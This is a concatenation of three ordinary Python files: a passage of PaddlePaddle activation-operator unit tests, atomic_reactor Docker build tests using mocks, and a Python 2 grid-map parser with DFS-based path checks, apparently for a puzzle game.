self.op_type = "floor"
self.init_dtype()
x = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)
out = np.floor(x)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
# the gradient on floor, ceil, round is undefined.
# we return zero as gradient, but the numpy return nan
# The same reason with TestFloor
def test_check_grad(self):
pass
class TestCos(TestActivation):
def setUp(self):
self.op_type = "cos"
self.init_dtype()
x = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)
out = np.cos(x)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestAcos(TestActivation):
def setUp(self):
self.op_type = "acos"
self.init_dtype()
x = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)
out = np.arccos(x)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestSin(TestActivation):
def setUp(self):
self.op_type = "sin"
self.init_dtype()
x = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)
out = np.sin(x)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestAsin(TestActivation):
def setUp(self):
self.op_type = "asin"
self.init_dtype()
x = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)
out = np.arcsin(x)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestRound(TestActivation):
def setUp(self):
self.op_type = "round"
self.init_dtype()
x = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)
out = np.round(x)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
pass
class TestRelu(TestActivation):
def setUp(self):
self.op_type = "relu"
self.init_dtype()
x = np.random.uniform(-1, 1, [11, 17]).astype(self.dtype)
# The same reason with TestAbs
x[np.abs(x) < 0.005] = 0.02
out = np.maximum(x, 0)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestLeakyRelu(TestActivation):
def setUp(self):
self.op_type = "leaky_relu"
self.init_dtype()
x = np.random.uniform(-1, 1, [11, 17]).astype(self.dtype)
# The same reason with TestAbs
x[np.abs(x) < 0.005] = 0.02
out = np.maximum(x, 0.02 * x)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestGelu(TestActivation):
def setUp(self):
self.op_type = "gelu"
self.init_dtype()
x = np.random.uniform(-1, 1, [11, 17]).astype(self.dtype)
out = 0.5 * x * (1.0 + erf(x / np.sqrt(2.0)))
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestBRelu(TestActivation):
def setUp(self):
self.op_type = "brelu"
self.init_dtype()
x = np.random.uniform(-1, 1, [4, 4]).astype(self.dtype)
t_min = 1.0
t_max = 4.0
# The same with TestAbs
x[np.abs(x - t_min) < 0.005] = t_min + 0.02
x[np.abs(x - t_max) < 0.005] = t_max + 0.02
t = np.copy(x)
t[t < t_min] = t_min
t[t > t_max] = t_max
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.attrs = {'t_min': t_min, 't_max': t_max}
self.outputs = {'Out': t}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.02)
class TestRelu6(TestActivation):
def setUp(self):
self.op_type = "relu6"
self.init_dtype()
x = np.random.uniform(-1, 1, [4, 10]).astype(self.dtype)
threshold = 6.0
# The same with TestAbs
x[np.abs(x) < 0.005] = 0.02
x[np.abs(x - threshold) < 0.005] = threshold + 0.02
out = np.minimum(np.maximum(x, 0), threshold)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.attrs = {'threshold': threshold}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.02)
class TestHardSwish(TestActivation):
def setUp(self):
self.op_type = 'hard_swish'
self.init_dtype()
x = np.random.uniform(-6, 6, [4, 4]).astype(self.dtype)
threshold = 6.0
scale = 6.0
offset = 3.0
#the same with TestAbs
x[np.abs(x + offset) < 0.005] = 0.02
x[np.abs(x - threshold + offset) < 0.005] = threshold - offset + 0.02
out = x * np.minimum(np.maximum(x + offset, 0), threshold) / scale
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.attrs = {'threshold': threshold, 'scale': scale, 'offset': offset}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.02)
class TestSoftRelu(TestActivation):
def setUp(self):
self.op_type = "soft_relu"
self.init_dtype()
x = np.random.uniform(-3, 3, [4, 4]).astype(self.dtype)
threshold = 2.0
# The same reason with TestAbs
x[np.abs(x - threshold) < 0.005] = threshold + 0.02
x[np.abs(x + threshold) < 0.005] = -threshold + 0.02
t = np.copy(x)
t[t < -threshold] = -threshold
t[t > threshold] = threshold
out = np.log((np.exp(t) + 1))
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.attrs = {'threshold': threshold}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.02)
class TestELU(TestActivation):
def setUp(self):
self.op_type = "elu"
self.init_dtype()
x = np.random.uniform(-3, 3, [4, 4]).astype(self.dtype)
alpha = 1.
out = np.maximum(0, x) + np.minimum(0, alpha * (np.exp(x) - 1))
# Note: unlike other Relu extensions, point 0 on standard ELU function (i.e. alpha = 1)
# is differentiable, so we can skip modifications like x[np.abs(x) < 0.005] = 0.02 here
self.inputs = {'X': x}
self.attrs = {'alpha': alpha}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.02)
class TestReciprocal(TestActivation):
def setUp(self):
self.op_type = "reciprocal"
self.init_dtype()
x = np.random.uniform(1, 2, [11, 17]).astype(self.dtype)
out = np.reciprocal(x)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.01)
class TestLog(TestActivation):
def setUp(self):
self.op_type = "log"
self.init_dtype()
x = np.random.uniform(0.1, 1, [11, 17]).astype(self.dtype)
out = np.log(x)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestSquare(TestActivation):
def setUp(self):
self.op_type = "square"
self.init_dtype()
x = np.random.uniform(0.1, 1, [11, 17]).astype(self.dtype)
out = np.square(x)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestPow(TestActivation):
def setUp(self):
self.op_type = "pow"
self.init_dtype()
x = np.random.uniform(1, 2, [11, 17]).astype(self.dtype)
out = np.power(x, 3)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.attrs = {'factor': 3.0}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.02)
class TestPow_factor_tensor(TestActivation):
def setUp(self):
self.op_type = "pow"
self.init_dtype()
x = np.random.uniform(1, 2, [11, 17]).astype(self.dtype)
out = np.power(x, 3)
self.inputs = {
'X': OpTest.np_dtype_to_fluid_dtype(x),
'FactorTensor': np.array([3.0]).astype("float32")
}
self.attrs = {}
self.outputs = {'Out': out}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.02)
def test_api(self):
import paddle.fluid as fluid
input = np.random.uniform(1, 2, [11, 17]).astype("float32")
x = fluid.layers.data(
name="x", shape=[11, 17], append_batch_size=False, dtype="float32")
factor_1 = 2.0
factor_2 = fluid.layers.fill_constant([1], "float32", 3.0)
out_1 = fluid.layers.pow(x, factor=factor_1)
out_2 = fluid.layers.pow(x, factor=factor_2)
exe = fluid.Executor(place=fluid.CPUPlace())
res_1, res_2 = exe.run(fluid.default_main_program(),
feed={"x": input},
fetch_list=[out_1, out_2])
assert np.array_equal(res_1, np.power(input, 2))
assert np.array_equal(res_2, np.power(input, 3))
class TestSTanh(TestActivation):
def setUp(self):
self.op_type = "stanh"
self.init_dtype()
x = np.random.uniform(0.1, 1, [11, 17]).astype(self.dtype)
scale_a = 2.0 / 3.0
scale_b = 1.7159
out = scale_b * np.tanh(x * scale_a)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.attrs = {'scale_a': scale_a, 'scale_b': scale_b}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestSoftplus(TestActivation):
def setUp(self):
self.op_type = "softplus"
self.init_dtype()
self.dtype = np.float64
x = np.random.uniform(-1, 1, [11, 17]).astype(self.dtype)
out = np.log(1 + np.exp(x))
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestSoftsign(TestActivation):
def setUp(self):
self.op_type = "softsign"
self.init_dtype()
x = np.random.uniform(-1, 1, [11, 17]).astype(self.dtype)
out = np.divide(x, 1 + np.abs(x))
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.007)
class TestThresholdedRelu(TestActivation):
def setUp(self):
self.op_type = "thresholded_relu"
self.init_dtype()
threshold = 0.25
self.relative_error = 0.005
X = np.random.uniform(-1, 1, [11, 17]).astype(self.dtype)
# Same reason as TestAbs
X[np.abs(X - threshold) < self.relative_error] = threshold + 0.2
out = (X > threshold) * X
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(X)}
self.attrs = {'threshold': threshold}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=self.relative_error)
class TestHardSigmoid(TestActivation):
def setUp(self):
self.op_type = "hard_sigmoid"
self.init_dtype()
self.relative_error = 0.002
X = np.random.uniform(-5, 5, [2, 2]).astype("float32")
slope = 0.2
offset = 0.5
lower_threshold = -offset / slope
upper_threshold = (1 - offset) / slope
# Same reason as TestAbs
X[np.abs(X - lower_threshold) < self.relative_error] = \
lower_threshold + 0.2
X[np.abs(X - upper_threshold) < self.relative_error] = \
upper_threshold - 0.2
temp = X * slope + offset
out = np.maximum(0.0, np.minimum(1.0, temp))
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(X)}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.002)
class TestSwish(TestActivation):
def setUp(self):
self.op_type = "swish"
self.init_dtype()
X = np.random.uniform(0.1, 1, [11, 17]).astype(self.dtype)
beta = 2.3
out = X * expit(beta * X)
self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(X)}
self.attrs = {'beta': beta}
self.outputs = {'Out': out}
def test_check_grad(self):
if self.dtype == np.float16:
return
self.check_grad(['X'], 'Out', max_relative_error=0.008)
#------------------ Test Cudnn Activation----------------------
def create_test_act_cudnn_class(parent, atol=1e-3, grad_atol=1e-3):
@unittest.skipIf(not core.is_compiled_with_cuda(),
"core is not compiled with CUDA")
class TestActCudnn(parent):
def init_kernel_type(self):
self.attrs = {"use_cudnn": True}
cls_name = "{0}_{1}".format(parent.__name__, "cudnn")
TestActCudnn.__name__ = cls_name
globals()[cls_name] = TestActCudnn
create_test_act_cudnn_class(TestRelu)
create_test_act_cudnn_class(TestRelu6)
create_test_act_cudnn_class(TestSigmoid)
create_test_act_cudnn_class(TestTanh)
#------------------ Test Fp16 ----------------------
def create_test_act_fp16_class(parent,
atol=1e-3,
grad_check=True,
grad_atol=0.80):
@unittest.skipIf(not core.is_compiled_with_cuda(),
"core is not compiled with CUDA")
class TestActFp16(parent):
def init_dtype(self):
self.dtype = np.float16
def test_check_output(self):
place = core.CUDAPlace(0)
support_fp16 = core.is_float16_supported(place)
if support_fp16:
self.check_output_with_place(place, atol=atol)
def test_check_grad(self):
place = core.CUDAPlace(0)
support_fp16 = core.is_float16_supported(place)
if support_fp16 and grad_check:
self.check_grad_with_place(
place, ['X'], 'Out', max_relative_error=grad_atol)
cls_name = "{0}_{1}".format(parent.__name__, "fp16")
TestActFp16.__name__ = cls_name
globals()[cls_name] = TestActFp16
create_test_act_fp16_class(TestActivation)
create_test_act_fp16_class(TestSigmoid)
create_test_act_fp16_class(TestLogSigmoid)
create_test_act_fp16_class(TestTanh)
create_test_act_fp16_class(TestTanhShrink)
create_test_act_fp16_class(TestHardShrink)
create_test_act_fp16_class(TestSoftShrink)
create_test_act_fp16_class(TestSqrt)
create_test_act_fp16_class(TestAbs)
create_test_act_fp16_class(TestCeil, grad_check=False)
create_test_act_fp16_class(TestFloor, grad_check=False)
create_test_act_fp16_class(TestCos, grad_atol=0.85)
create_test_act_fp16_class(TestAcos, grad_atol=0.85)
create_test_act_fp16_class(TestSin)
create_test_act_fp16_class(TestAsin)
create_test_act_fp16_class(TestAtan)
create_test_act_fp16_class(TestRound, grad_check=False)
create_test_act_fp16_class(TestRelu)
create_test_act_fp16_class(TestGelu)
create_test_act_fp16_class(TestBRelu)
create_test_act_fp16_class(TestRelu6)
create_test_act_fp16_class(TestSoftRelu)
create_test_act_fp16_class(TestELU)
create_test_act_fp16_class(TestReciprocal)
create_test_act_fp16_class(TestLog)
create_test_act_fp16_class(TestSquare)
create_test_act_fp16_class(TestPow, atol=5e-2)
create_test_act_fp16_class(TestPow_factor_tensor, atol=5e-2)
create_test_act_fp16_class(TestSTanh, grad_atol=0.9)
create_test_act_fp16_class(TestSoftplus)
create_test_act_fp16_class(TestSoftsign)
create_test_act_fp16_class(TestThresholdedRelu)
create_test_act_fp16_class(TestHardSigmoid)
create_test_act_fp16_class(TestSwish)
create_test_act_fp16_class(TestHardSwish)
if __name__ == "__main__":
unittest.main()
| |
"""
Copyright (c) 2015 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
"""
import pytest
import atomic_reactor.util
import docker.errors
from atomic_reactor.build import InsideBuilder, BuildResult
from atomic_reactor.source import get_source_instance_for
from atomic_reactor.util import df_parser, DockerfileImages
from tests.constants import (
LOCALHOST_REGISTRY, MOCK, SOURCE,
DOCKERFILE_OK_PATH, DOCKERFILE_MULTISTAGE_PATH,
DOCKERFILE_MULTISTAGE_SCRATCH_PATH, DOCKERFILE_MULTISTAGE_CUSTOM_PATH,
DOCKERFILE_MULTISTAGE_CUSTOM_BAD_PATH
)
from atomic_reactor.constants import CONTAINER_DOCKERPY_BUILD_METHOD
from osbs.utils import ImageName
from tests.util import requires_internet
from flexmock import flexmock
from textwrap import dedent
if MOCK:
from tests.docker_mock import mock_docker
# This stuff is used in tests; you have to have internet connection,
# running registry on port 5000 and it helps if you've pulled fedora:latest before
git_base_repo = "fedora"
git_base_tag = "latest"
git_base_image = ImageName(registry=LOCALHOST_REGISTRY, repo="fedora", tag="latest")
with_all_sources = pytest.mark.parametrize('source_params', [
SOURCE,
{'provider': 'path', 'uri': 'file://' + DOCKERFILE_OK_PATH},
{'provider': 'path', 'uri': 'file://' + DOCKERFILE_MULTISTAGE_PATH},
{'provider': 'path', 'uri': 'file://' + DOCKERFILE_MULTISTAGE_SCRATCH_PATH},
{'provider': 'path', 'uri': 'file://' + DOCKERFILE_MULTISTAGE_CUSTOM_PATH},
])
default_build_method = CONTAINER_DOCKERPY_BUILD_METHOD
@requires_internet
def test_different_custom_base_images(tmpdir):
if MOCK:
mock_docker()
source_params = {'provider': 'path', 'uri': 'file://' + DOCKERFILE_MULTISTAGE_CUSTOM_BAD_PATH,
'tmpdir': str(tmpdir)}
s = get_source_instance_for(source_params)
with pytest.raises(NotImplementedError) as exc:
InsideBuilder(s, '')
message = "multiple different custom base images aren't allowed in Dockerfile"
assert message in str(exc.value)
@requires_internet
@with_all_sources
def test_inspect_built_image(tmpdir, source_params):
provided_image = "test-build:test_tag"
if MOCK:
mock_docker(provided_image_repotags=provided_image)
flexmock(InsideBuilder, ensure_is_built=None)
source_params.update({'tmpdir': str(tmpdir)})
s = get_source_instance_for(source_params)
b = InsideBuilder(s, provided_image)
b.tasker.build_method = default_build_method
built_inspect = b.inspect_built_image()
assert built_inspect is not None
assert built_inspect["Id"] is not None
@requires_internet
@with_all_sources
@pytest.mark.parametrize('insecure', [True, False])
@pytest.mark.parametrize('parents_pulled', [True, False])
def test_parent_image_inspect(insecure, parents_pulled, tmpdir, source_params):
provided_image = "test-build:test_tag"
if MOCK:
mock_docker(provided_image_repotags=provided_image)
source_params.update({'tmpdir': str(tmpdir)})
s = get_source_instance_for(source_params)
b = InsideBuilder(s, provided_image)
b.tasker.build_method = default_build_method
b.parents_pulled = parents_pulled
provided_imagename = ImageName.parse(provided_image)
registry_name = "registry.example.com"
provided_imagename.registry = registry_name
b.pull_registries = {registry_name: {'insecure': insecure, 'dockercfg_path': str(tmpdir)}}
if not parents_pulled:
(flexmock(atomic_reactor.util)
.should_receive('get_inspect_for_image')
.with_args(provided_imagename, provided_imagename.registry, insecure, str(tmpdir))
.and_return({'Id': 123}))
built_inspect = b.parent_image_inspect(provided_imagename)
assert built_inspect is not None
assert built_inspect["Id"] is not None
@requires_internet
@with_all_sources
@pytest.mark.parametrize('parents_pulled', [True, False])
@pytest.mark.parametrize('insecure', [True, False])
@pytest.mark.parametrize('base_exist', [True, False])
def test_base_image_inspect(tmpdir, source_params, parents_pulled, insecure, base_exist):
if MOCK:
mock_docker()
source_params.update({'tmpdir': str(tmpdir)})
s = get_source_instance_for(source_params)
b = InsideBuilder(s, '')
b.tasker.build_method = default_build_method
b.parents_pulled = parents_pulled
if b.dockerfile_images.base_from_scratch:
base_exist = True
registry_name = "registry.example.com"
original_parents = b.dockerfile_images.original_parents
new_parents = []
for parent in original_parents:
if parent == 'scratch':
new_parents.append(parent)
else:
mod_parent = ImageName.parse(parent)
mod_parent.registry = registry_name
new_parents.append(mod_parent.to_str())
b.dockerfile_images = DockerfileImages(new_parents)
b.pull_registries = {registry_name: {'insecure': insecure, 'dockercfg_path': str(tmpdir)}}
if base_exist:
if b.dockerfile_images.base_from_scratch:
built_inspect = b.base_image_inspect
assert built_inspect == {}
else:
if not parents_pulled:
(flexmock(atomic_reactor.util)
.should_receive('get_inspect_for_image')
.with_args(b.dockerfile_images.base_image, b.dockerfile_images.base_image.registry,
insecure, str(tmpdir))
.and_return({'Id': 123}))
built_inspect = b.base_image_inspect
assert built_inspect is not None
assert built_inspect["Id"] is not None
else:
if parents_pulled or b.dockerfile_images.custom_base_image:
response = flexmock(content="not found", status_code=404)
(flexmock(docker.APIClient)
.should_receive('inspect_image')
.and_raise(docker.errors.NotFound, "xyz", response))
with pytest.raises(KeyError):
b.base_image_inspect # pylint: disable=pointless-statement; is a property
else:
(flexmock(atomic_reactor.util)
.should_receive('get_inspect_for_image')
.and_raise(NotImplementedError))
with pytest.raises(NotImplementedError):
b.base_image_inspect # pylint: disable=pointless-statement; is a property
@requires_internet
@with_all_sources
@pytest.mark.parametrize(('image', 'will_raise'), [
(
"buildroot-fedora:latest",
False,
),
(
"non-existing",
True,
),
])
def test_get_base_image_info(tmpdir, source_params, image, will_raise):
if DOCKERFILE_MULTISTAGE_CUSTOM_PATH in source_params['uri']:
return
if MOCK:
mock_docker(provided_image_repotags=image)
source_params.update({'tmpdir': str(tmpdir)})
s = get_source_instance_for(source_params)
b = InsideBuilder(s, image)
b.tasker.build_method = default_build_method
if b.dockerfile_images.base_from_scratch:
will_raise = False
if will_raise:
with pytest.raises(Exception):
b.get_base_image_info()
else:
built_inspect = b.get_base_image_info()
if b.dockerfile_images.base_from_scratch:
assert built_inspect is None
else:
assert built_inspect is not None
assert built_inspect["Id"] is not None
assert built_inspect["RepoTags"] is not None
def test_no_base_image(tmpdir):
if MOCK:
mock_docker()
source = {'provider': 'path', 'uri': 'file://' + DOCKERFILE_OK_PATH, 'tmpdir': str(tmpdir)}
b = InsideBuilder(get_source_instance_for(source), 'built-img')
dfp = df_parser(str(tmpdir))
dfp.content = "# no FROM\nADD spam /eggs"
with pytest.raises(RuntimeError) as exc:
b.set_df_path(str(tmpdir))
assert "no base image specified" in str(exc.value)
def test_copy_from_is_blocked(tmpdir):
"""test when user has specified COPY --from=image (instead of builder)"""
dfp = df_parser(str(tmpdir))
if MOCK:
mock_docker()
source = {'provider': 'path', 'uri': 'file://' + str(tmpdir), 'tmpdir': str(tmpdir)}
dfp.content = dedent("""\
FROM monty AS vikings
FROM python
COPY --from=vikings /spam/eggs /bin/eggs
COPY --from=0 /spam/eggs /bin/eggs
COPY src dest
""")
# init calls set_df_path, which should not raise an error:
InsideBuilder(get_source_instance_for(source), 'built-img')
dfp.content = dedent("""\
FROM monty as vikings
FROM python
# using a stage name we haven't seen should break:
COPY --from=notvikings /spam/eggs /bin/eggs
""")
with pytest.raises(RuntimeError) as exc_info:
InsideBuilder(get_source_instance_for(source), 'built-img') # calls set_df_path at init
assert "FROM notvikings AS source" in str(exc_info.value)
dfp.content = dedent("""\
FROM monty as vikings
# using an index we haven't seen should break:
COPY --from=5 /spam/eggs /bin/eggs
""")
with pytest.raises(RuntimeError) as exc_info:
InsideBuilder(get_source_instance_for(source), 'built-img') # calls set_df_path at init
assert "COPY --from=5" in str(exc_info.value)
@requires_internet
@with_all_sources
@pytest.mark.parametrize('is_built', [
True,
False,
])
def test_ensure_built(tmpdir, source_params, is_built):
if MOCK:
mock_docker()
source_params.update({'tmpdir': str(tmpdir)})
s = get_source_instance_for(source_params)
b = InsideBuilder(s, '')
b.is_built = is_built
if is_built:
assert b.ensure_is_built() is None
with pytest.raises(Exception):
b.ensure_not_built()
else:
assert b.ensure_not_built() is None
with pytest.raises(Exception):
b.ensure_is_built()
@requires_internet
@with_all_sources
@pytest.mark.parametrize(('image', 'will_raise'), [
(
"buildroot-fedora:latest",
False,
),
(
"non-existing",
True,
),
])
def test_get_image_built_info(tmpdir, source_params, image, will_raise):
if MOCK:
mock_docker(provided_image_repotags=image)
source_params.update({'tmpdir': str(tmpdir)})
s = get_source_instance_for(source_params)
b = InsideBuilder(s, image)
b.tasker.build_method = default_build_method
if will_raise:
with pytest.raises(Exception):
b.get_built_image_info()
else:
b.get_built_image_info()
def test_build_result():
with pytest.raises(AssertionError):
BuildResult(fail_reason='it happens', image_id='spam')
with pytest.raises(AssertionError):
BuildResult(fail_reason='', image_id='spam')
with pytest.raises(AssertionError):
BuildResult(fail_reason='it happens', oci_image_path='/somewhere')
with pytest.raises(AssertionError):
BuildResult(image_id='spam', oci_image_path='/somewhere')
with pytest.raises(AssertionError):
BuildResult(image_id='spam', fail_reason='it happens', oci_image_path='/somewhere')
assert BuildResult(fail_reason='it happens').is_failed()
assert not BuildResult(image_id='spam').is_failed()
assert BuildResult(image_id='spam', logs=list('logs')).logs == list('logs')
assert BuildResult(fail_reason='it happens').fail_reason == 'it happens'
assert BuildResult(image_id='spam').image_id == 'spam'
assert BuildResult(image_id='spam', annotations={'ham': 'mah'}).annotations == {'ham': 'mah'}
assert BuildResult(image_id='spam', labels={'ham': 'mah'}).labels == {'ham': 'mah'}
assert BuildResult(oci_image_path='/somewhere').oci_image_path == '/somewhere'
assert BuildResult(image_id='spam').is_image_available()
assert not BuildResult(fail_reason='it happens').is_image_available()
assert not BuildResult.make_remote_image_result().is_image_available()
assert not BuildResult.make_remote_image_result().is_failed()
def test_parent_images_to_str(tmpdir, caplog):
if MOCK:
mock_docker()
source = {'provider': 'path', 'uri': 'file://' + DOCKERFILE_OK_PATH, 'tmpdir': str(tmpdir)}
b = InsideBuilder(get_source_instance_for(source), 'built-img')
b.dockerfile_images = DockerfileImages(['fedora:latest', 'bacon'])
b.dockerfile_images['fedora:latest'] = "spam"
expected_results = {
"fedora:latest": "spam:latest"
}
assert b.parent_images_to_str() == expected_results
assert "None in: base bacon:latest has parent None" in caplog.text
| |
#!/usr/bin/env python
# -*- utf-8 -*-
import re
import copy
import time
# This is const data
direct = ['u', 'r', 'd', 'l']
direct_vector = [{'x' : -1, 'y' : 0},
{'x' : 0, 'y' : 1},
{'x' : 1, 'y' : 0},
{'x' : 0, 'y' : -1}]
def calculateNum(i, f, y):
return i * y + f
def is_empty_not_change(map_data, i, f):
if i >= map_data['x'] or i < 0:
return False
if f >= map_data['y'] or f < 0:
return False
return map_data['map'][i][f]
def is_empty(map_data, i, f):
if i >= map_data['x'] or i < 0:
return False
if f >= map_data['y'] or f < 0:
return False
if not map_data['map'][i][f]:
return False
map_data['map'][i][f] = False
return True
def parse_map(raw_str):
map_data = {}
print 'start parse map info\n'
print 'here is map info ' + raw_str
# x is height , y is width
x = int(re.search('x=[0-9]+&', raw_str).group()[2:-1])
y = int(re.search('y=[0-9]+&', raw_str).group()[2:-1])
str_map = raw_str[-x*y : ]
map_data['x'] = x;
map_data['y'] = y;
map_data['map'] = []
for i in range(x):
this_row = []
for f in range(y):
if '1' == str_map[calculateNum(i, f, y)]:
this_row.append(False)
else:
this_row.append(True)
map_data['map'].append(copy.deepcopy(this_row))
'''
for i in range(x):
for f in range(y):
if not map_data['map'][i][f]:
print '#',
else:
print '*',
print ''
print 'this level x =', x, 'y =', y
'''
return map_data
def count_du_1(map_data):
response = []
for i in range(map_data['x']):
for f in range(map_data['y']):
if not map_data['map'][i][f]:
continue
du = 0
for dir_enum in range(4):
new_x = i + direct_vector[dir_enum]['x']
new_y = f + direct_vector[dir_enum]['y']
if is_empty_not_change(map_data, new_x, new_y):
du += 1
if 1 == du:
response.append([i, f])
return response
def get_must_info(map_data, x, y): # need update
fill = 0
flag_id = 0
map_data_another = copy.deepcopy(map_data)
def div_dfs(x, y):
count = 0
map_data_another['map'][x][y] = False
for i in range(4):
new_x = x + direct_vector[i]['x']
new_y = y + direct_vector[i]['y']
if is_empty(map_data_another, new_x ,new_y):
count += div_dfs(new_x, new_y)
return count + 1
def dfs(x, y, flag):
map_data['map'][x][y] = flag
for i in range(4):
new_x = x + direct_vector[i]['x']
new_y = y + direct_vector[i]['y']
if judge_empty(new_x, new_y):
if isinstance(map_data['map'][new_x][new_y], bool):
dfs(new_x, new_y, flag)
def judge_empty(x, y):
if x < 0 or x >= map_data['x']:
return False
if y < 0 or y >= map_data['y']:
return False
if isinstance(map_data['map'][x][y], bool):
return map_data['map'][x][y]
return True
for i in range(map_data['x']):
for f in range(map_data['y']):
if map_data['map'][i][f]:
fill += 1
du = 0
first_x, first_y = i, f
for dir_enum in range(4):
new_x = i + direct_vector[dir_enum]['x']
new_y = f + direct_vector[dir_enum]['y']
if True == judge_empty(new_x, new_y):
du += 1
if du < 3:
map_data['map'][i][f] = flag_id
flag_id += 1
if 0 == fill:
return 0, True
if div_dfs(first_x, first_y) != fill:
return fill, False
for i in range(map_data['x']):
for f in range(map_data['y']):
if (True == judge_empty(i, f)) and isinstance(map_data['map'][i][f], bool):
dfs(i, f, flag_id)
flag_id += 1
#tongji
edge_table = []
for i in range(flag_id):
edge_table.append([])
du_count = [0] * flag_id
for i in range(map_data['x']):
for f in range(map_data['y']):
if not isinstance(map_data['map'][i][f], bool):
for dir_enum in [0, 3]:
new_x = i + direct_vector[dir_enum]['x']
new_y = f + direct_vector[dir_enum]['y']
if judge_empty(new_x, new_y):
point_foo = map_data['map'][i][f]
point_bar = map_data['map'][new_x][new_y]
if point_foo != point_bar:
du_count[point_foo] += 1
du_count[point_bar] += 1
edge_table[point_foo].append(point_bar)
edge_table[point_bar].append(point_foo)
du_odd_count = 0
du_zero_exist = False
for point_enum in range(flag_id):
if 0 == du_count[point_enum]:
du_zero_exist = True
if 1 == (du_count[point_enum] % 2):
du_odd_count += 1
# exist zero du
if len(du_count) > 1 and du_zero_exist:
return fill ,False
# all even point
if 0 == du_odd_count:
return fill, True
if 2 != du_odd_count:
return fill, False
# start point enum, odd point equal 2
for dir_enum in range(4):
new_x = x + direct_vector[dir_enum]['x']
new_y = y + direct_vector[dir_enum]['y']
if judge_empty(new_x, new_y):
start_id = map_data['map'][new_x][new_y]
if 1 == (du_count[start_id] % 2):
return fill, True
for another_point in edge_table[start_id]:
if 1 == (du_count[another_point] % 2):
return fill, True
return fill, False
# just fit small 100 hash
def hash_function(map_data, x, y):
response = 0
for i in range(map_data['x']):
for f in range(map_data['y']):
response *= 2
if map_data['map'][i][f]:
response += 1
response = response * 100 + x
response = response * 100 + y
# return hash(response) conflict
return response
